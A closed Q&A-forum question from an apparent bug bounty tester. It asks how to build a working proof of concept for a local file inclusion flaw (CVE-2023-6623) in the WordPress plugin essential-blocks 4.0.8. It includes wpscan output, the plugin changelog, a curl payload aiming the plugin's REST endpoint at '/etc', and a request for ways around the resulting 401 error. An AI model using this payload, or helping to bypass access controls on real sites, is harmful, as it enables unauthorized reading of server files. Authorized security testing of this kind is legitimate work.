14Nis
Navigating CVE-2023-6623: Seeking Assistance in Crafting a WordPress LFI Vulnerability Proof of Concept [closed]
I was testing on a private bug bounty program and found one of its assets is running WordPress, upon enumerating its plugins using wpscan
I found a plugin essential-blocks@4.0.8
which is vulnerable to LFI see CVE-2023-6623.
However am unable to create a Poc for it.
wpscan output:
[+] essential-blocks
| Location: https://foo.bar.com/wp-content/plugins/essential-blocks/
| Last Updated: 2024-04-09T10:50:00.000Z
| [!] The version is out of date, the latest version is 4.5.9
|
| Found By: Urls In Homepage (Passive Detection)
|
| Version: 4.0.8 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - https://foo.bar.com/wp-content/plugins/essential-blocks/readme.txt
vp readme.txt (essential-blocks/readme.txt):
== Changelog ==
= 4.0.8 - 18/04/2023
- Fixed: Security update & bugfix
= 4.0.7 - 17/04/2023
- Fixed: **Count Down** block's error in style tab
- Fixed: **Flipbox** block's richtext invalid html tag issue
- Fixed: Assets generation issue
- Fixed: **Advanced Navigation** block's undefined js error ....
i think this confirms it really is running the version essential-blocks@4.0.8
however when i try to exploit it with
curl --url 'http://foo.bar.com/wp-json/essential-blocks
/v1/queries?block_type=nonexisting_block&query_data={"source":+"post"}
&attributes={"__file":+"/etc"}'
i get a 401 error as
{"code":"rest_cannot_access",
"message":"DRA: Only authenticated users can access the REST API.",
"data":{"status":401}}
Note: I am url encoding
it before sending also I am pretty sure it's not blocked by any external WAF and is probably an issue with Wordpress. This POC was uploaded by wpscan itself, see https://wpscan.com/vulnerability/633c28e0-0c9e-4e68-9424-55c32789b41f/
I want to know:
- What does this error mean
- What steps can I further take to find the proper poc bypassing this error
- On a rough estimate, can it be exploited with more leads or should I report this issue and avoid wasting any time